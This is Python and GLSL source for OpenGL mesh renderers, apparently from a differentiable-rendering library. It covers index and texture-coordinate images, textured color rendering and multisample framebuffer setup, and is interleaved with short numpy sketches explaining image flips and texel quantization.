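`glReadPixels` returns bottom-up RGB bytes, so decoding follows the pattern used above: reshape to (height, width, 3), flip vertically, then read indices out of the red channel. A pure-numpy sketch with a stand-in byte buffer:

```python
import numpy as np

width, height = 3, 2
raw = np.arange(width * height * 3, dtype=np.uint8).tobytes()  # stand-in for the GL buffer
# bottom-up buffer -> top-down image, one uint32 id per pixel from the R channel
img = np.flipud(np.frombuffer(raw, np.uint8).reshape(height, width, 3).astype(np.uint32))
ids = img[:, :, 0]
assert ids.shape == (height, width)
assert ids[0, 0] == 9   # top-left pixel came from the second (upper) raw row
```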
@depends_on(dterms+terms)
def indices_image(self):
self._call_on_changed()
self.makeCurrentContext()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for index in range(len(self.f_list)):
self.draw_index(index)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result
def draw_index(self, index):
mesh = index
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
vc = self.vc_list[mesh]
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(vc.reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
colors = np.array(np.ones_like(colors_by_face) * (index) / 255.0, dtype=np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
def draw_texcoord_image(self, v, f, ft, boundarybool_image=None):
# gl = glf
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
self.makeCurrentContext()
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# want vtc: texture-coordinates per vertex (not per element in vc)
colors = ft
#use the third channel to identify the corresponding textures.
color3 = np.vstack([np.ones([self.ft_list[mesh].shape[0],1])*mesh for mesh in range(len(self.ft_list))]).astype(np.float32) / len(self.ft_list)
colors = np.asarray(np.hstack((colors, color3)), np.float64, order='C')
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
#Why do we need this?
if boundarybool_image is not None:
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3).astype(np.float64))/255.0
result[:,:,1] = 1. - result[:,:,1]
return result
@depends_on('ft', 'textures')
def mesh_tex_coords(self):
ftidxs = self.ft.ravel()
data = self.ft
# Pol: careful with this:
data[:,1] = 1.0 - 1.0*data[:,1]
return data
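OpenGL samples textures with the origin at the bottom-left, hence the v-flip (`v -> 1 - v`) performed above; a minimal sketch on invented texture coordinates:

```python
import numpy as np

ft = np.array([[0.25, 0.0],
               [0.50, 1.0],
               [0.75, 0.4]])
flipped = ft.copy()
flipped[:, 1] = 1.0 - flipped[:, 1]   # flip only the v coordinate
assert np.allclose(flipped[:, 1], [1.0, 0.0, 0.6])
assert np.allclose(flipped[:, 0], ft[:, 0])   # u is untouched
```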
# Depends on 'f' because vpe/fpe depend on f
# Pol: Check that depends on works on other attributes that depend_on x, if x changes.
@depends_on( 'ft', 'f')
def wireframe_tex_coords(self):
print("wireframe_tex_coords is being computed!")
vvt = np.zeros((self.v.r.size // 3, 2), dtype=np.float64, order='C')
vvt[self.f.flatten()] = self.mesh_tex_coords
edata = vvt[self.vpe.ravel()]
return edata
# TODO: can this not be inherited from base? turning off texture mapping in that instead?
@depends_on(dterms+terms)
def boundaryid_image(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
def draw_color_image(self, with_vertex_colors=True, with_texture_on=True):
self.makeCurrentContext()
self._call_on_changed()
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vc = colors_by_face
if with_vertex_colors:
colors = vc.astype(np.float32)
else:
# Only texture.
colors = np.ones_like(vc).astype(np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
if with_texture_on and self.haveUVs_list[mesh][polygons]:
GL.glUseProgram(self.colorTextureProgram)
texture = self.textureID_mesh_list[mesh][polygons]
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureID, 0)
else:
GL.glUseProgram(self.colorProgram)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'], GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3).astype(np.float64))/255.0
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0.,0.,0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1,1,3))
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image_quantized(self):
texcoord_image = self.texcoord_image[:,:, :2].copy()
# Temporary:
self.texture_image = self.textures_list[0][0].r.copy()
texcoord_image[:,:,0] *= self.texture_image.shape[1]-1
texcoord_image[:,:,1] *= self.texture_image.shape[0]-1
texture_idx = (self.texcoord_image[:,:,2]*len(self.ft_list)).astype(np.uint32)
texcoord_image = np.round(texcoord_image)
texcoord_image = texcoord_image[:,:,0] + texcoord_image[:,:,1]*self.texture_image.shape[1]
return texcoord_image, texture_idx
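The quantization above maps normalized (u, v) to a linear texel index: scale by (W-1, H-1), round, then index = x + y*W. A small sketch with a hypothetical 8x4 texture:

```python
import numpy as np

tex_h, tex_w = 4, 8
uv = np.array([[0.0, 0.0],
               [1.0, 1.0]])
x = np.round(uv[:, 0] * (tex_w - 1))   # column in texels
y = np.round(uv[:, 1] * (tex_h - 1))   # row in texels
linear = x + y * tex_w                 # row-major linear texel index
assert linear.tolist() == [0.0, 31.0]  # (0,0) -> 0, (7,3) -> 7 + 3*8
```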
def checkBufferNum(self):
GL.glGenBuffers(1)
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image(self):
return self.draw_texcoord_image(self.v.r, self.f, self.ft, self.boundarybool_image if self.overdraw else None)
class ResidualRenderer(ColoredRenderer):
terms = 'f', 'frustum', 'vt', 'ft', 'background_image', 'overdraw', 'ft_list', 'haveUVs_list', 'textures_list', 'vc_list', 'imageGT'
dterms = 'vc', 'camera', 'bgcolor', 'texture_stack', 'v'
def __init__(self):
super().__init__()
def clear(self):
try:
GL.glFlush()
GL.glFinish()
# print ("Clearing textured renderer.")
# for msh in self.vbo_indices_mesh_list:
# for vbo in msh:
# vbo.set_array([])
[vbo.set_array(np.array([])) for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_face_ids_list for vbo in sublist]
[GL.glDeleteVertexArrays(1, [vao.value]) for sublist in self.vao_tex_mesh_list for vao in sublist]
self.release_textures()
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
GL.glDeleteProgram(self.colorTextureProgram)
super().clear()
except Exception:
import pdb
pdb.set_trace()
print("Program had not been initialized")
def initGLTexture(self):
print("Initializing Texture OpenGL.")
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
//#extension GL_EXT_shader_image_load_store : enable
in vec3 theColor;
in vec2 UV;
uniform sampler2D myTextureSampler;
// Output data
out vec3 color;
void main(){
color = theColor * texture( myTextureSampler, UV ).rgb; // texture() replaces deprecated texture2D() in 330 core
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
layout(location = 2) in vec2 vertexUV;
uniform mat4 MVP;
out vec3 theColor;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
UV = vertexUV;
}""", GL.GL_VERTEX_SHADER)
self.colorTextureProgram = shaders.compileProgram(VERTEX_SHADER, FRAGMENT_SHADER)
# Define the other VAO/VBOs and shaders.
# Text VAO and bind color, vertex indices AND uvbuffer:
position_location = GL.glGetAttribLocation(self.colorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorTextureProgram, 'color')
uvs_location = GL.glGetAttribLocation(self.colorTextureProgram, 'vertexUV')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_texture_location = GL.glGetUniformLocation(self.colorTextureProgram, 'MVP')
self.vbo_indices_mesh_list = []
self.vbo_colors_mesh = []
self.vbo_verts_mesh = []
self.vao_tex_mesh_list = []
self.vbo_uvs_mesh = []
self.textureID_mesh_list = []
# GL.glEnable(GL.GL_LINE_SMOOTH)
# GL.glHint(GL.GL_LINE_SMOOTH_HINT, GL.GL_NICEST)
GL.glLineWidth(2.)
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_indices_mesh = []
vbo_face_ids_mesh = []
vbo_colors_mesh = []
vbo_vertices_mesh = []
vbo_uvs_mesh = []
textureIDs_mesh = []
for polygons in range(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_verts = vbo.VBO(verts_by_face)
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_colors = vbo.VBO(colors_by_face)
uvs_by_face = np.asarray(self.ft_list[mesh].reshape((-1, 2))[f.ravel()], dtype=np.float32, order='C')
vbo_uvs = vbo.VBO(uvs_by_face)
vbo_indices = vbo.VBO(np.asarray(f, dtype=np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
vbo_indices.bind()
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location)  # from 'location = 1' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
if self.haveUVs_list[mesh][polygons]:
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location)  # from 'location = 2' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# Textures:
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = GL.GLuint(0)
GL.glGenTextures(1, texture)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)  # bind first so the parameters below apply to this texture
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT, 1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)  # only one mip level is allocated below
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
textureIDs_mesh.append(texture)
vbo_indices_mesh.append(vbo_indices)
vbo_colors_mesh.append(vbo_colors)
vbo_vertices_mesh.append(vbo_verts)
vbo_uvs_mesh.append(vbo_uvs)
vaos_mesh.append(vao)
self.textureID_mesh_list.append(textureIDs_mesh)
self.vao_tex_mesh_list.append(vaos_mesh)
self.vbo_indices_mesh_list.append(vbo_indices_mesh)
self.vbo_colors_mesh.append(vbo_colors_mesh)
self.vbo_verts_mesh.append(vbo_vertices_mesh)
self.vbo_uvs_mesh.append(vbo_uvs_mesh)
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glBindVertexArray(0)
self.textureID = GL.glGetUniformLocation(self.colorTextureProgram, "myTextureSampler")
def initGL_AnalyticRenderer(self):
self.initGLTexture()
self.updateRender = True
self.updateDerivatives = True
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 colorIn;
layout(location = 2) in vec2 vertexUV;
layout(location = 3) in uint face_id;
layout(location = 4) in vec3 barycentric;
uniform mat4 MVP;
out vec3 theColor;
out vec4 pos;
flat out uint face_out;
out vec3 barycentric_vert_out;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
pos = MVP * vec4(position,1);
//pos = pos4.xyz;
theColor = colorIn;
UV = vertexUV;
face_out = face_id;
barycentric_vert_out = barycentric;
}""", GL.GL_VERTEX_SHADER)
ERRORS_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
//layout(early_fragment_tests) in;
// Interpolated values from the vertex shaders
in vec3 theColor;
in vec2 UV;
flat in uint face_out;
in vec4 pos;
in vec3 barycentric_vert_out;
layout(location = 3) uniform sampler2D myTextureSampler;
uniform float ww;
uniform float wh;
// Output data
layout(location = 0) out vec3 color;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 barycentric1;
layout(location = 4) out vec2 barycentric2;
void main(){
vec3 finalColor = theColor * texture( myTextureSampler, UV ).rgb; // texture() replaces deprecated texture2D() in 330 core
color = finalColor.rgb;
sample_pos = ((0.5*pos.xy/pos.w) + 0.5)*vec2(ww,wh);
sample_face = face_out;
barycentric1 = barycentric_vert_out.xy;
barycentric2 = vec2(barycentric_vert_out.z, 0.);
}""", GL.GL_FRAGMENT_SHADER)
self.errorTextureProgram = shaders.compileProgram(VERTEX_SHADER, ERRORS_FRAGMENT_SHADER)
FETCH_VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
void main() {}
""", GL.GL_VERTEX_SHADER)
FETCH_GEOMETRY_SHADER = shaders.compileShader("""#version 330 core
layout(points) in;
layout(triangle_strip, max_vertices = 4) out;
const vec2 data[4] = vec2[]
(
vec2(-1.0, 1.0),
vec2(-1.0, -1.0),
vec2( 1.0, 1.0),
vec2( 1.0, -1.0)
);
void main() {
for (int i = 0; i < 4; ++i) {
gl_Position = vec4( data[i], 0.0, 1.0 );
EmitVertex();
}
EndPrimitive();
}""", GL.GL_GEOMETRY_SHADER)
FETCH_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
layout(location = 2) uniform sampler2DMS colors;
layout(location = 3) uniform sampler2DMS sample_positions;
layout(location = 4) uniform usampler2DMS sample_faces;
layout(location = 5) uniform sampler2DMS sample_barycentric_coords1;
layout(location = 6) uniform sampler2DMS sample_barycentric_coords2;
//layout(location = 7) uniform sampler2D imageGT;
uniform float ww;
uniform float wh;
uniform int sample;
// Output data
layout(location = 0) out vec3 colorFetchOut;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 sample_barycentric1;
layout(location = 4) out vec2 sample_barycentric2;
//layout(location = 5) out vec3 res;
//out int gl_SampleMask[];
const int all_sample_mask = 0xffff;
void main(){
ivec2 texcoord = ivec2(gl_FragCoord.xy);
colorFetchOut = texelFetch(colors, texcoord, sample).xyz;
sample_pos = texelFetch(sample_positions, texcoord, sample).xy;
sample_face = texelFetch(sample_faces, texcoord, sample).r;
sample_barycentric1 = texelFetch(sample_barycentric_coords1, texcoord, sample).xy;
sample_barycentric2 = texelFetch(sample_barycentric_coords2, texcoord, sample).xy;
//vec3 imgColor = texture2D(imageGT, gl_FragCoord.xy/vec2(ww,wh)).rgb;
//res = imgColor - colorFetchOut;
}""", GL.GL_FRAGMENT_SHADER)
GL.glClampColor(GL.GL_CLAMP_READ_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_VERTEX_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_FRAGMENT_COLOR, False)
self.fetchSamplesProgram = shaders.compileProgram(FETCH_VERTEX_SHADER, FETCH_GEOMETRY_SHADER, FETCH_FRAGMENT_SHADER)
self.textureGT = GL.GLuint(0)
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glGenTextures(1, self.textureGT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# #
# try:
# if self.imageGT.r is not None and self.imageGT.r.size != 0: #if GT image is defined.
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# except:
# pass
# GL.glGenTextures(1, self.textureEdges)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureEdges)
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glActiveTexture(GL.GL_TEXTURE0)
whitePixel = np.ones([1, 1, 3])
self.whitePixelTextureID = GL.GLuint(0)
GL.glGenTextures(1, self.whitePixelTextureID)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.whitePixelTextureID)
image = np.array(np.flipud((whitePixel)), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
self.fbo_ms_errors = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_ms_errors)
self.texture_errors_render = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RGB8, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
self.texture_errors_sample_position = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
self.texture_errors_sample_faces = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_R32UI, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces, 0)
#
self.texture_errors_sample_barycentric1 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1,
0)
self.texture_errors_sample_barycentric2 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
